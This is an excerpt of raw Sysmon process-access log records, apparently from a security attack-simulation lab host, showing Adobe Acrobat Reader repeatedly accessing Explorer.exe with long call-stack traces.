(x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.351{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.351{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba 10341000x800000000000000046726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.351{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.350{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.350{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.350{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba 10341000x800000000000000046722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.350{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.349{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b657|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.349{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b657|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.349{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b657|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.349{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b657|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.347{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a251|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.347{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a251|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.347{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a251|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.347{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a251|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.346{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a149|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.346{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader 